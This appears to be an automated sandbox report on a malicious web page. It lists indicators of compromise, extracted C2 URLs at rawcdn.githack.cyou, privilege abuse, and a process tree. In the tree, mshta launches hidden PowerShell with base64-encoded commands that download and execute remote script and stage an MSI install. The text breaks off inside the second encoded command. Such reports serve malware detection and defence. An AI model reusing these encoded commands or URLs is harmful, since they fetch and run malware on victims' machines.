Analysis
-
max time kernel
93s -
max time network
141s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
01-12-2020 15:06
Static task
static1
URLScan task
urlscan1
Sample
https://speedjudgmentacceleration.com/index.php?key=total
Behavioral task
behavioral1
Sample
https://speedjudgmentacceleration.com/index.php?key=total
Resource
win10v20201028
General
-
Target
https://speedjudgmentacceleration.com/index.php?key=total
-
Sample
201201-m2hmz24gps
Malware Config
Extracted
http://rawcdn.githack.cyou/up.php?key=1
Extracted
http://rawcdn.githack.cyou/up.php?key=2
Signatures
-
Blacklisted process makes network request 3 IoCs
Processes:
powershell.exemsiexec.exeflow pid process 33 580 powershell.exe 35 4448 msiexec.exe 38 4448 msiexec.exe -
Loads dropped DLL 5 IoCs
Processes:
MsiExec.exepid process 4560 MsiExec.exe 4560 MsiExec.exe 4560 MsiExec.exe 4560 MsiExec.exe 4560 MsiExec.exe -
Modifies file permissions 1 TTPs 4 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exepid process 1812 takeown.exe 3120 takeown.exe 2724 takeown.exe 4464 takeown.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exedescription ioc process File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\Y: msiexec.exe -
Drops file in Windows directory 14 IoCs
Processes:
msiexec.exedescription ioc process File created C:\Windows\.log msiexec.exe File created C:\Windows\.xml msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSIA6CB.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA7D7.tmp msiexec.exe File created C:\Windows\.ini msiexec.exe File opened for modification C:\Windows\Installer\MSIA4B5.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA5A1.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA466.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA533.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI910A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIA32C.tmp msiexec.exe -
Processes:
iexplore.exeIEXPLORE.EXEdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "585571202" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30853107" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "313599956" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{4DBEC886-33E6-11EB-BEBD-6A3FD5463AB0} = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager IEXPLORE.EXE Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "578070716" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30853107" IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress iexplore.exe Key created \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "313648541" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "313616549" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "578070716" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30853107" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" iexplore.exe -
Modifies data under HKEY_USERS 58 IoCs
Processes:
powershell.exemsiexec.exeMsiExec.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe,-124 = "Document Encryption" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17\52C64B7E\@%SystemRoot%\system32\dnsapi.dll,-103 = "Domain Name System (DNS) Server Trust" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings MsiExec.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings\JITDebug = "0" MsiExec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
powershell.exepowershell.exemsiexec.exepowershell.exepid process 580 powershell.exe 580 powershell.exe 580 powershell.exe 2296 powershell.exe 2296 powershell.exe 2296 powershell.exe 4448 msiexec.exe 4448 msiexec.exe 4676 powershell.exe 4676 powershell.exe 4676 powershell.exe -
Suspicious use of AdjustPrivilegeToken 61 IoCs
Processes:
powershell.exepowershell.exemsiexec.exetakeown.exetakeown.exetakeown.exetakeown.exepowershell.exedescription pid process Token: SeDebugPrivilege 580 powershell.exe Token: SeDebugPrivilege 2296 powershell.exe Token: SeShutdownPrivilege 2296 powershell.exe Token: SeIncreaseQuotaPrivilege 2296 powershell.exe Token: SeSecurityPrivilege 4448 msiexec.exe Token: SeCreateTokenPrivilege 2296 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2296 powershell.exe Token: SeLockMemoryPrivilege 2296 powershell.exe Token: SeIncreaseQuotaPrivilege 2296 powershell.exe Token: SeMachineAccountPrivilege 2296 powershell.exe Token: SeTcbPrivilege 2296 powershell.exe Token: SeSecurityPrivilege 2296 powershell.exe Token: SeTakeOwnershipPrivilege 2296 powershell.exe Token: SeLoadDriverPrivilege 2296 powershell.exe Token: SeSystemProfilePrivilege 2296 powershell.exe Token: SeSystemtimePrivilege 2296 powershell.exe Token: SeProfSingleProcessPrivilege 2296 powershell.exe Token: SeIncBasePriorityPrivilege 2296 powershell.exe Token: SeCreatePagefilePrivilege 2296 powershell.exe Token: SeCreatePermanentPrivilege 2296 powershell.exe Token: SeBackupPrivilege 2296 powershell.exe Token: SeRestorePrivilege 2296 powershell.exe Token: SeShutdownPrivilege 2296 powershell.exe Token: SeDebugPrivilege 2296 powershell.exe Token: SeAuditPrivilege 2296 powershell.exe Token: SeSystemEnvironmentPrivilege 2296 powershell.exe Token: SeChangeNotifyPrivilege 2296 powershell.exe Token: SeRemoteShutdownPrivilege 2296 powershell.exe Token: SeUndockPrivilege 2296 powershell.exe Token: SeSyncAgentPrivilege 2296 powershell.exe Token: SeEnableDelegationPrivilege 2296 powershell.exe Token: SeManageVolumePrivilege 2296 powershell.exe Token: SeImpersonatePrivilege 2296 powershell.exe Token: SeCreateGlobalPrivilege 2296 powershell.exe Token: SeRestorePrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 4448 msiexec.exe Token: SeRestorePrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 4448 msiexec.exe Token: SeRestorePrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 4448 msiexec.exe Token: SeRestorePrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 4448 msiexec.exe Token: SeRestorePrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 4448 msiexec.exe Token: SeRestorePrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 4448 msiexec.exe Token: SeRestorePrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 4448 msiexec.exe Token: SeRestorePrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 4448 msiexec.exe Token: SeRestorePrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 1812 takeown.exe Token: SeTakeOwnershipPrivilege 3120 takeown.exe Token: SeTakeOwnershipPrivilege 2724 takeown.exe Token: SeTakeOwnershipPrivilege 4464 takeown.exe Token: SeRestorePrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 4448 msiexec.exe Token: SeRestorePrivilege 4448 msiexec.exe Token: SeTakeOwnershipPrivilege 4448 msiexec.exe Token: SeDebugPrivilege 4676 powershell.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
iexplore.exepid process 4756 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
Processes:
iexplore.exeIEXPLORE.EXEpid process 4756 iexplore.exe 4756 iexplore.exe 3000 IEXPLORE.EXE 3000 IEXPLORE.EXE 3000 IEXPLORE.EXE 3000 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 120 IoCs
Processes:
iexplore.exeIEXPLORE.EXEmshta.exepowershell.exepowershell.execsc.exemsiexec.exeMsiExec.exedescription pid process target process PID 4756 wrote to memory of 3000 4756 iexplore.exe IEXPLORE.EXE PID 4756 wrote to memory of 3000 4756 iexplore.exe IEXPLORE.EXE PID 4756 wrote to memory of 3000 4756 iexplore.exe IEXPLORE.EXE PID 3000 wrote to memory of 2232 3000 IEXPLORE.EXE mshta.exe PID 3000 wrote to memory of 2232 3000 IEXPLORE.EXE mshta.exe PID 3000 wrote to memory of 2232 3000 IEXPLORE.EXE mshta.exe PID 2232 wrote to memory of 580 2232 mshta.exe powershell.exe PID 2232 wrote to memory of 580 2232 mshta.exe powershell.exe PID 2232 wrote to memory of 580 2232 mshta.exe powershell.exe PID 580 wrote to memory of 2296 580 powershell.exe powershell.exe PID 580 wrote to memory of 2296 580 powershell.exe powershell.exe PID 580 wrote to memory of 2296 580 powershell.exe powershell.exe PID 2296 wrote to memory of 4396 2296 powershell.exe csc.exe PID 2296 wrote to memory of 4396 2296 powershell.exe csc.exe PID 2296 wrote to memory of 4396 2296 powershell.exe csc.exe PID 4396 wrote to memory of 1752 4396 csc.exe cvtres.exe PID 4396 wrote to memory of 1752 4396 csc.exe cvtres.exe PID 4396 wrote to memory of 1752 4396 csc.exe cvtres.exe PID 4448 wrote to memory of 4560 4448 msiexec.exe MsiExec.exe PID 4448 wrote to memory of 4560 4448 msiexec.exe MsiExec.exe PID 4448 wrote to memory of 4560 4448 msiexec.exe MsiExec.exe PID 4448 wrote to memory of 1320 4448 msiexec.exe MsiExec.exe PID 4448 wrote to memory of 1320 4448 msiexec.exe MsiExec.exe PID 4448 wrote to memory of 1320 4448 msiexec.exe MsiExec.exe PID 1320 wrote to memory of 3060 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 3060 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 3060 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 2844 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 2844 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 2844 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 1068 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 1068 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 1068 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4980 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4980 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4980 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 3992 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 3992 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 3992 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4228 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4228 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4228 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4328 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4328 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4328 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 1356 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 1356 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 1356 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 1048 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 1048 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 1048 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 2924 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 2924 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 2924 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 2208 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 2208 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 2208 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 3084 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 3084 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 3084 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4836 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4836 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4836 1320 MsiExec.exe netsh.exe PID 1320 wrote to memory of 4716 1320 MsiExec.exe netsh.exe
Processes
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" https://speedjudgmentacceleration.com/index.php?key=total1⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4756 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4756 CREDAT:82945 /prefetch:22⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3000 -
C:\Windows\SysWOW64\mshta.exemshta vbscript:createobject("wscript.shell").run("PowerShell -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADsAJABpACsAKwApAA0ACgB7AA0ACgBpAGUAeAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwB5AG8AdQAvAHUAcAAuAHAAaABwAD8AawBlAHkAPQAxACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA4ADAADQAKAH0ADQAKAA==",0)(window.close)3⤵
- Suspicious use of WriteProcessMemory
PID:2232 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAGYAbwByACgAJABpAD0AMQA7ACQAaQAgAC0AbABlACAAMQAwADsAJABpACsAKwApAA0ACgB7AA0ACgBpAGUAeAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwB5AG8AdQAvAHUAcAAuAHAAaABwAD8AawBlAHkAPQAxACIAKQANAAoAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAAMQA4ADAADQAKAH0ADQAKAA==4⤵
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:580 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -exec bypass -EncodedCommand DQAKACQAUgBlAGcAawBlAHkAcABhAHQAaAAgAD0AIAAiAEgASwBDAFUAOgBcAFMAbwBmAHQAdwBhAHIAZQBcADcALQBaAGkAcAAiAA0ACgBBAGQAZAAtAFQAeQBwAGUAIAAtAFQAeQBwAGUARABlAGYAaQBuAGkAdABpAG8AbgAgAEAAIgANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0AOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBEAGkAYQBnAG4AbwBzAHQAaQBjAHMAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMAOwANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGMAbABhAHMAcwAgAFAARgA4ADgAZABOAGMAZABzAEQARABxAGUANwBaAGYADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwBpAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAGQAdQBjAHQAKABzAHQAcgBpAG4AZwAgAHAAYQBjAGsAYQBnAGUAUABhAHQAaAAsACAAcwB0AHIAaQBuAGcAIABjAG8AbQBtAGEAbgBkAEwAaQBuAGUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAH